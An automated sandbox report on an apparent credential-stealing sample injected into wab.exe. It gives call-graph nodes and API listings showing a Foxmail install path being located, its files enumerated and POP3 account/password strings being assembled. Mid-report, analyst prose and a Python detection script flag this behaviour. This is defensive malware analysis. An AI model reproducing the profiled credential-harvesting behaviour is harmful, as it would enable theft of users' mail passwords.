RtlLeaveCriticalSection 6798->6801 6800 22796e16 6800->6795 6801->6800 7621 2279af43 7622 2279af59 7621->7622 7623 2279af4d 7621->7623 7623->7622 7624 2279af52 CloseHandle 7623->7624 7624->7622 7625 2279a945 7627 2279a96d 7625->7627 7626 2279a9a5 7627->7626 7628 2279a99e 7627->7628 7629 2279a997 7627->7629 7638 2279aa00 7628->7638 7634 2279aa17 7629->7634 7635 2279aa20 7634->7635 7642 2279b19b 7635->7642 7639 2279aa20 7638->7639 7640 2279b19b __startOneArgErrorHandling 21 API calls 7639->7640 7641 2279a9a3 7640->7641 7643 2279b1da __startOneArgErrorHandling 7642->7643 7645 2279b25c __startOneArgErrorHandling 7643->7645 7652 2279b59e 7643->7652 7649 227978a3 __startOneArgErrorHandling 5 API calls 7645->7649 7651 2279b286 7645->7651 7646 2279b8b2 __startOneArgErrorHandling 20 API calls 7647 2279b292 7646->7647 7648 22792ada _ValidateLocalCookies 5 API calls 7647->7648 7650 2279a99c 7648->7650 7649->7651 7651->7646 7651->7647 7653 2279b5c1 __raise_exc RaiseException 7652->7653 7654 2279b5bc 7653->7654 7654->7645 7936 22797bc7 7937 22797bd3 ___DestructExceptionObject 7936->7937 7939 22797c0a _abort 7937->7939 7944 22795671 RtlEnterCriticalSection 7937->7944 7940 22797be7 7941 22797f86 __fassign 20 API calls 7940->7941 7942 22797bf7 7941->7942 7945 22797c10 7942->7945 7944->7940 7948 227956b9 RtlLeaveCriticalSection 7945->7948 7947 22797c17 7947->7939 7948->7947 7949 2279a1c6 IsProcessorFeaturePresent 7950 22799db8 7951 22799dbf 7950->7951 7952 22799e20 7951->7952 7956 22799ddf 7951->7956 7953 2279aa17 21 API calls 7952->7953 7954 2279a90e 7952->7954 7955 22799e6e 7953->7955 7956->7954 7957 2279aa17 21 API calls 7956->7957 7958 2279a93e 7957->7958 6802 2279543d 6803 22795440 6802->6803 6804 227955a8 _abort 38 API calls 6803->6804 6805 2279544c 6804->6805 7655 22791f3f 7656 22791f4b ___DestructExceptionObject 7655->7656 7673 2279247c 7656->7673 7658 22791f52 7659 22791f7c 7658->7659 7660 22792041 7658->7660 7667 22791f57 ___scrt_is_nonwritable_in_current_image 7658->7667 
7684 227923de 7659->7684 7662 22792639 ___scrt_fastfail 4 API calls 7660->7662 7663 22792048 7662->7663 7664 22791f8b __RTC_Initialize 7664->7667 7687 227922fc RtlInitializeSListHead 7664->7687 7666 22791f99 ___scrt_initialize_default_local_stdio_options 7688 227946c5 7666->7688 7671 22791fb8 7671->7667 7672 22794669 _abort 5 API calls 7671->7672 7672->7667 7674 22792485 7673->7674 7696 22792933 IsProcessorFeaturePresent 7674->7696 7678 22792496 7683 2279249a 7678->7683 7707 227953c8 7678->7707 7681 227924b1 7681->7658 7682 22793529 ___vcrt_uninitialize 8 API calls 7682->7683 7683->7658 7738 227924b5 7684->7738 7686 227923e5 7686->7664 7687->7666 7689 227946dc 7688->7689 7690 22792ada _ValidateLocalCookies 5 API calls 7689->7690 7691 22791fad 7690->7691 7691->7667 7692 227923b3 7691->7692 7693 227923b8 ___scrt_release_startup_lock 7692->7693 7694 22792933 ___isa_available_init IsProcessorFeaturePresent 7693->7694 7695 227923c1 7693->7695 7694->7695 7695->7671 7697 22792491 7696->7697 7698 227934ea 7697->7698 7699 227934ef ___vcrt_initialize_winapi_thunks 7698->7699 7710 22793936 7699->7710 7702 227934fd 7702->7678 7704 22793505 7705 22793510 7704->7705 7706 22793972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7704->7706 7705->7678 7706->7702 7734 22797457 7707->7734 7711 2279393f 7710->7711 7713 22793968 7711->7713 7714 227934f9 7711->7714 7724 22793be0 7711->7724 7715 22793972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7713->7715 7714->7702 7716 227938e8 7714->7716 7715->7714 7729 22793af1 7716->7729 7719 227938fd 7719->7704 7720 22793ba2 ___vcrt_FlsSetValue 6 API calls 7721 2279390b 7720->7721 7722 22793918 7721->7722 7723 2279391b ___vcrt_uninitialize_ptd 6 API calls 7721->7723 7722->7704 7723->7719 7725 22793a82 try_get_function 5 API calls 7724->7725 7726 22793bfa 7725->7726 7727 22793c18 InitializeCriticalSectionAndSpinCount 7726->7727 7728 22793c03 7726->7728 7727->7728 7728->7711 7730 22793a82 try_get_function 5 API calls 7729->7730 7731 
22793b0b 7730->7731 7732 22793b24 TlsAlloc 7731->7732 7733 227938f2 7731->7733 7733->7719 7733->7720 7737 22797470 7734->7737 7735 22792ada _ValidateLocalCookies 5 API calls 7736 227924a3 7735->7736 7736->7681 7736->7682 7737->7735 7739 227924c4 7738->7739 7740 227924c8 7738->7740 7739->7686 7741 22792639 ___scrt_fastfail 4 API calls 7740->7741 7743 227924d5 ___scrt_release_startup_lock 7740->7743 7742 22792559 7741->7742 7743->7686 6806 22795630 6807 2279563b 6806->6807 6809 22795664 6807->6809 6810 22795660 6807->6810 6812 22795eb7 6807->6812 6819 22795688 6809->6819 6813 22795c45 _abort 5 API calls 6812->6813 6814 22795ede 6813->6814 6815 22795efc InitializeCriticalSectionAndSpinCount 6814->6815 6816 22795ee7 6814->6816 6815->6816 6817 22792ada _ValidateLocalCookies 5 API calls 6816->6817 6818 22795f13 6817->6818 6818->6807 6820 227956b4 6819->6820 6821 22795695 6819->6821 6820->6810 6822 2279569f RtlDeleteCriticalSection 6821->6822 6822->6820 6822->6822 7225 22793eb3 7228 22795411 7225->7228 7229 2279541d _abort 7228->7229 7230 22795af6 _abort 38 API calls 7229->7230 7231 22795422 7230->7231 7232 227955a8 _abort 38 API calls 7231->7232 7233 2279544c 7232->7233 6823 2279742b 6824 22797430 6823->6824 6825 22797453 6824->6825 6827 22798bae 6824->6827 6828 22798bbb 6827->6828 6829 22798bdd 6827->6829 6830 22798bc9 RtlDeleteCriticalSection 6828->6830 6831 22798bd7 6828->6831 6829->6824 6830->6830 6830->6831 6832 2279571e _free 20 API calls 6831->6832 6832->6829 7234 227960ac 7235 227960dd 7234->7235 7236 227960b7 7234->7236 7236->7235 7237 227960c7 FreeLibrary 7236->7237 7237->7236 7959 227921a1 ___scrt_dllmain_exception_filter 7960 227981a0 7961 227981d9 7960->7961 7962 227981dd 7961->7962 7973 22798205 7961->7973 7963 22796368 __dosmaperr 20 API calls 7962->7963 7964 227981e2 7963->7964 7966 227962ac _abort 26 API calls 7964->7966 7965 22798529 7967 22792ada _ValidateLocalCookies 5 API calls 7965->7967 7968 227981ed 7966->7968 7969 22798536 7967->7969 7970 
22792ada _ValidateLocalCookies 5 API calls 7968->7970 7972 227981f9 7970->7972 7973->7965 7974 227980c0 7973->7974 7977 227980db 7974->7977 7975 22792ada _ValidateLocalCookies 5 API calls 7976 22798152 7975->7976 7976->7973 7977->7975 6197 2279c7a7 6198 2279c7be 6197->6198 6207 2279c82c 6197->6207 6198->6207 6209 2279c7e6 GetModuleHandleA 6198->6209 6199 2279c872 6200 2279c835 GetModuleHandleA 6202 2279c83f 6200->6202 6202->6202 6204 2279c85f GetProcAddress 6202->6204 6202->6207 6203 2279c7dd 6203->6202 6205 2279c800 GetProcAddress 6203->6205 6203->6207 6204->6207 6206 2279c80d VirtualProtect 6205->6206 6205->6207 6206->6207 6208 2279c81c VirtualProtect 6206->6208 6207->6199 6207->6200 6207->6202 6208->6207 6210 2279c7ef 6209->6210 6216 2279c82c 6209->6216 6221 2279c803 GetProcAddress 6210->6221 6212 2279c872 6213 2279c835 GetModuleHandleA 6218 2279c83f 6213->6218 6214 2279c7f4 6215 2279c800 GetProcAddress 6214->6215 6214->6216 6215->6216 6217 2279c80d VirtualProtect 6215->6217 6216->6212 6216->6213 6216->6218 6217->6216 6219 2279c81c VirtualProtect 6217->6219 6218->6216 6220 2279c85f GetProcAddress 6218->6220 6219->6216 6220->6216 6222 2279c82c 6221->6222 6223 2279c80d VirtualProtect 6221->6223 6225 2279c835 GetModuleHandleA 6222->6225 6226 2279c872 6222->6226 6223->6222 6224 2279c81c VirtualProtect 6223->6224 6224->6222 6228 2279c83f 6225->6228 6227 2279c85f GetProcAddress 6227->6228 6228->6222 6228->6227 6833 22792418 6834 22792420 ___scrt_release_startup_lock 6833->6834 6837 227947f5 6834->6837 6836 22792448 6838 22794808 6837->6838 6839 22794804 6837->6839 6842 22794815 6838->6842 6839->6836 6843 22795b7a __dosmaperr 20 API calls 6842->6843 6846 2279482c 6843->6846 6844 22792ada _ValidateLocalCookies 5 API calls 6845 22794811 6844->6845 6845->6836 6846->6844 7238 22794a9a 7239 22795411 38 API calls 7238->7239 7240 22794aa2 7239->7240 7978 2279679a 7979 227967a4 7978->7979 7980 227967b4 7979->7980 7981 2279571e _free 20 API calls 7979->7981 7982 2279571e _free 
20 API calls 7980->7982 7981->7979 7983 227967bb 7982->7983 6847 2279281c 6848 22792882 std::exception::exception 27 API calls 6847->6848 6849 2279282a 6848->6849 7241 22793c90 RtlUnwind 7242 22798a89 7243 22796d60 51 API calls 7242->7243 7244 22798a8e 7243->7244 7245 2279508a 7246 2279509c 7245->7246 7247 227950a2 7245->7247 7248 22795000 20 API calls 7246->7248 7248->7247 6850 2279220c 6851 2279221a dllmain_dispatch 6850->6851 6852 22792215 6850->6852 6854 227922b1 6852->6854 6855 227922c7 6854->6855 6856 227922d0 6855->6856 6858 22792264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6855->6858 6856->6851 6858->6856 7249 22797a80 7250 22797a8d 7249->7250 7251 2279637b _abort 20 API calls 7250->7251 7252 22797aa7 7251->7252 7253 2279571e _free 20 API calls 7252->7253 7254 22797ab3 7253->7254 7255 2279637b _abort 20 API calls 7254->7255 7258 22797ad9 7254->7258 7257 22797acd 7255->7257 7256 22795eb7 11 API calls 7256->7258 7259 2279571e _free 20 API calls 7257->7259 7258->7256 7260 22797ae5 7258->7260 7259->7258 7744 22795303 7747 227950a5 7744->7747 7756 2279502f 7747->7756 7750 2279502f 5 API calls 7751 227950c3 7750->7751 7752 22795000 20 API calls 7751->7752 7753 227950ce 7752->7753 7754 22795000 20 API calls 7753->7754 7755 227950d9 7754->7755 7757 22795048 7756->7757 7758 22792ada _ValidateLocalCookies 5 API calls 7757->7758 7759 22795069 7758->7759 7759->7750 7760 22797103 GetCommandLineA GetCommandLineW

                    Control-flow Graph

                    APIs
                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22791137
                    • lstrcatW.KERNEL32(?,?), ref: 22791151
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2279115C
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2279116D
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2279117C
                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22791193
                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 227911D0
                    • FindClose.KERNELBASE(00000000), ref: 227911DB
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                    • String ID:
                    • API String ID: 1083526818-0
                    • Opcode ID: 1da1b2d0541054ee57c797bc58e4316bd0835eee2d58cd4458278768185f57e7
                    • Instruction ID: c629ed5a84efa63084d6e00d5ca38c862cecc22b8859a3592f2636816b7fb942
                    • Opcode Fuzzy Hash: 1da1b2d0541054ee57c797bc58e4316bd0835eee2d58cd4458278768185f57e7
                    • Instruction Fuzzy Hash: 812173715483486BD711EA64DC4CF9B7BECEF84314F000D2AB958D3190E774D615CB96
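The API listing above (the helper at 227910F1, which builds a path with lstrcatW and walks a directory with FindFirstFileW/FindNextFileW/FindClose) only becomes meaningful together with the listing of its caller that follows on this page: the caller reads %ProgramFiles% via GetEnvironmentVariableW and, per its String ID entry, appends "Foxmail", so the pair is the sample locating a Foxmail installation, which is what the "Tries to steal Mail credentials" signature is built on. The script below is an added example, not part of the report or of Joe Sandbox: it parses the bullet lines of such a listing (including the "Part of subcall function" attribution), counts the APIs, and applies one heuristic for "install root taken from an environment variable plus directory enumeration plus a mail-client marker string". The sample input is constructed from the lines on this page; the INSTALL_ROOTS and MAIL_CLIENT_MARKERS vocabularies are analyst assumptions (only ProgramFiles and Foxmail are attested here).

```python
"""Parse the per-function "APIs" listing of a Joe Sandbox report and flag
directory enumeration rooted at a mail-client install path.

Example code added to this page; it is not part of the report or of Joe
Sandbox. The vocabularies INSTALL_ROOTS and MAIL_CLIENT_MARKERS are analyst
assumptions; only "ProgramFiles" and "Foxmail" are attested in the listing.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: the bullet lines of the two function listings on this
# page (the caller that reads %ProgramFiles%, its subcall 227910F1 that walks
# a directory, and the caller's String ID entry).
SAMPLE = """\
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 22791434
  • Part of subcall function 227910F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22791137
  • Part of subcall function 227910F1: lstrcatW.KERNEL32(?,?), ref: 22791151
  • Part of subcall function 227910F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22791193
  • Part of subcall function 227910F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 227911D0
  • Part of subcall function 227910F1: FindClose.KERNELBASE(00000000), ref: 227911DB
• lstrlenW.KERNEL32(?), ref: 227914C5
• lstrcatW.KERNEL32(00000000), ref: 22791521
• String ID: )$Foxmail$ProgramFiles
"""

# "• [Part of subcall function ADDR: ]Api.MODULE(args), ref: ADDR"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                 # call-site address
    subcall: Optional[str]   # callee address when the line is "Part of subcall function"


def parse_listing(text: str) -> Tuple[List[ApiCall], List[str]]:
    """Return (API calls in listing order, strings from the String ID entry)."""
    calls, strings = [], []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            calls.append(ApiCall(m["api"], m["mod"].upper(), args, int(m["ref"], 16), m["sub"]))
            continue
        m = STRING_LINE.match(line)
        if m:
            # Joe Sandbox joins the referenced strings with "$"
            strings.extend(s for s in m["ids"].split("$") if s)
    return calls, strings


def api_histogram(calls: List[ApiCall]) -> Counter:
    """API name -> number of call sites (subcall lines included)."""
    return Counter(c.api for c in calls)


FILE_ENUM = {"FindFirstFileA", "FindFirstFileW", "FindNextFileA", "FindNextFileW"}
INSTALL_ROOTS = {"ProgramFiles", "ProgramFiles(x86)", "APPDATA", "LOCALAPPDATA"}  # assumed list
MAIL_CLIENT_MARKERS = {"foxmail"}  # assumed list; extend per analysis, only Foxmail is attested here


def assess(calls: List[ApiCall], strings: List[str]) -> List[str]:
    """Heuristic: env-var install root + Find* enumeration (+ mail-client string)."""
    roots = sorted({c.args[0] for c in calls
                    if c.api.startswith("GetEnvironmentVariable")
                    and c.args and c.args[0] in INSTALL_ROOTS})
    # attribute enumeration to the subcall address when the report does so
    enum_sites = sorted({c.subcall or f"{c.ref:08X}" for c in calls if c.api in FILE_ENUM})
    clients = sorted(s for s in strings if s.lower() in MAIL_CLIENT_MARKERS)
    root_str = "/".join("%" + r + "%" for r in roots)
    findings = []
    if roots and enum_sites:
        findings.append("directory enumeration in %s rooted at %s" % (", ".join(enum_sites), root_str))
    if roots and clients:
        findings.append("mail-client install path probed: %s under %s" % (", ".join(clients), root_str))
    return findings


if __name__ == "__main__":
    calls, strings = parse_listing(SAMPLE)
    print(dict(api_histogram(calls)))
    for finding in assess(calls, strings):
        print("FINDING:", finding)
```

The "Part of subcall function" indirection is how the report credits a callee's APIs to its caller; keeping the callee address in `subcall` lets the finding point at the reusable helper (227910F1) while the caller remains the place where the Foxmail path is assembled. When triaging a live host, the equivalent check is whether the injected wab.exe process opened files under the Foxmail directory, which is what separates credential harvesting from the benign CRT activity that fills most of this dump's graph.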

                    Control-flow Graph

                    APIs
                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 22791434
                      • Part of subcall function 227910F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22791137
                      • Part of subcall function 227910F1: lstrcatW.KERNEL32(?,?), ref: 22791151
                      • Part of subcall function 227910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2279115C
                      • Part of subcall function 227910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2279116D
                      • Part of subcall function 227910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2279117C
                      • Part of subcall function 227910F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22791193
                      • Part of subcall function 227910F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 227911D0
                      • Part of subcall function 227910F1: FindClose.KERNELBASE(00000000), ref: 227911DB
                    • lstrlenW.KERNEL32(?), ref: 227914C5
                    • lstrlenW.KERNEL32(?), ref: 227914E0
                    • lstrlenW.KERNEL32(?,?), ref: 2279150F
                    • lstrcatW.KERNEL32(00000000), ref: 22791521
                    • lstrlenW.KERNEL32(?,?), ref: 22791547
                    • lstrcatW.KERNEL32(00000000), ref: 22791553
                    • lstrlenW.KERNEL32(?,?), ref: 22791579
                    • lstrcatW.KERNEL32(00000000), ref: 22791585
                    • lstrlenW.KERNEL32(?,?), ref: 227915AB
                    • lstrcatW.KERNEL32(00000000), ref: 227915B7
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                    • String ID: )$Foxmail$ProgramFiles
                    • API String ID: 672098462-2938083778
                    • Opcode ID: c88f470146465f9d33aadaa02090aa4937df02f263687ea366baffcd0d22f26d
                    • Instruction ID: 57be5a9d2e54c2c565718f02184ff9f6621aa5b9620ea7208a7eaf011e12fcc1
                    • Opcode Fuzzy Hash: c88f470146465f9d33aadaa02090aa4937df02f263687ea366baffcd0d22f26d
                    • Instruction Fuzzy Hash: 4F810671A4435CA9EB20DBA4EC85FEF7779EF84710F00059AF509F71A0EAB15A84CB94

                    Control-flow Graph

                    APIs
                    • GetModuleHandleA.KERNEL32(2279C7DD), ref: 2279C7E6
                    • GetModuleHandleA.KERNEL32(?,2279C7DD), ref: 2279C838
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2279C860
                      • Part of subcall function 2279C803: GetProcAddress.KERNEL32(00000000,2279C7F4), ref: 2279C804
                      • Part of subcall function 2279C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2279C7F4,2279C7DD), ref: 2279C816
                      • Part of subcall function 2279C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2279C7F4,2279C7DD), ref: 2279C82A
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProtectVirtual
                    • String ID:
                    • API String ID: 2099061454-0
                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                    • Instruction ID: b57889215f354ffad6b37e32500a777594d632ddb53297aca731e63df3c53345
                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                    • Instruction Fuzzy Hash: 3F01D27094D741F8BE1257743D0BEBA6FD89B2F6A4B101B9EE24097193D9A08506C3A6

                    Control-flow Graph

                    APIs
                    • GetModuleHandleA.KERNEL32(?,2279C7DD), ref: 2279C838
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2279C860
                      • Part of subcall function 2279C7E6: GetModuleHandleA.KERNEL32(2279C7DD), ref: 2279C7E6
                      • Part of subcall function 2279C7E6: GetProcAddress.KERNEL32(00000000,2279C7F4), ref: 2279C804
                      • Part of subcall function 2279C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2279C7F4,2279C7DD), ref: 2279C816
                      • Part of subcall function 2279C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2279C7F4,2279C7DD), ref: 2279C82A
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProtectVirtual
                    • String ID:
                    • API String ID: 2099061454-0
                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                    • Instruction ID: d7d71193a51ac4eb06007ec7c7b27070b868424d9c11c81849409493f29ddd8e
                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                    • Instruction Fuzzy Hash: D421367240C781EFEF128B746D0AFA67FD89B1F3A4F18069ED140CB183D5A89546C3A2

                    Control-flow Graph

                    APIs
                    • GetProcAddress.KERNEL32(00000000,2279C7F4), ref: 2279C804
                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2279C7F4,2279C7DD), ref: 2279C816
                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2279C7F4,2279C7DD), ref: 2279C82A
                    • GetModuleHandleA.KERNEL32(?,2279C7DD), ref: 2279C838
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2279C860
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: AddressProcProtectVirtual$HandleModule
                    • String ID:
                    • API String ID: 2152742572-0
                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                    • Instruction ID: bb9fdc401c3e3f6ff590176caf0bd2049ccbdb3b726962d90124063a727e5e35
                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                    • Instruction Fuzzy Hash: 2EF0AF7154D740FCFE1247B43D47EB65FCC8B2F6A0B101A9EA200C7183D895850683F6
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 227961DA
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 227961E4
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 227961F1
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 76f4aac46a38c3dd7c37f90f1aea9efa576439c1accf97b5239fdc51e3c536a4
                    • Instruction ID: 785061ddd910596bdbc16c19a74905c412547b9b01513df6aa617ccf81700f1e
                    • Opcode Fuzzy Hash: 76f4aac46a38c3dd7c37f90f1aea9efa576439c1accf97b5239fdc51e3c536a4
                    • Instruction Fuzzy Hash: D131D47494531C9BCB21EF28D988B8DBBB8BF18310F5042DAE81CA7250E7749B818F45
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,22794A8A,?,227A2238,0000000C,22794BBD,00000000,00000000,00000001,22792082,227A2108,0000000C,22791F3A,?), ref: 22794AD5
                    • TerminateProcess.KERNEL32(00000000,?,22794A8A,?,227A2238,0000000C,22794BBD,00000000,00000000,00000001,22792082,227A2108,0000000C,22791F3A,?), ref: 22794ADC
                    • ExitProcess.KERNEL32 ref: 22794AEE
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 8d2914b9b4a376fbda18bdf0d036e9ef3eb19113d6bdc7d23a480b4d70add39b
                    • Instruction ID: 384844e70a692db997a2d5f2b26ccabd5fa3dc15e36342495043910b95e2fd0b
                    • Opcode Fuzzy Hash: 8d2914b9b4a376fbda18bdf0d036e9ef3eb19113d6bdc7d23a480b4d70add39b
                    • Instruction Fuzzy Hash: A7E0B636148748AFCF027F68DE5CA4A3B6AEF40345B504524FE098B525DB39E943DA58
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    • Opcode ID: a2871df9eab89fa83f59dea2f8b21a8ef03613f0ddeb2223570a91c1fe80280a
                    • Instruction ID: 1dc4cddb2f597c98a3c9834e3790ef0d66ca483d454e473ca79ecb41fbe07500
                    • Opcode Fuzzy Hash: a2871df9eab89fa83f59dea2f8b21a8ef03613f0ddeb2223570a91c1fe80280a
                    • Instruction Fuzzy Hash: 6DA011302882028F83008E3A820A20C3AAEAA022A03000828BC08CA008EB3880028A00

                    Control-flow Graph

                    APIs
                      • Part of subcall function 22791CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D1B
                      • Part of subcall function 22791CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22791D37
                      • Part of subcall function 22791CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22791D4B
                    • _strlen.LIBCMT ref: 22791855
                    • _strlen.LIBCMT ref: 22791869
                    • _strlen.LIBCMT ref: 2279188B
                    • _strlen.LIBCMT ref: 227918AE
                    • _strlen.LIBCMT ref: 227918C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _strlen$File$CopyCreateDelete
                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                    • API String ID: 3296212668-3023110444
                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                    • Instruction ID: e7e3a9545c7ba780941e46734fda0c2876e1d80c15a7c1f9764f783b122d5ced
                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
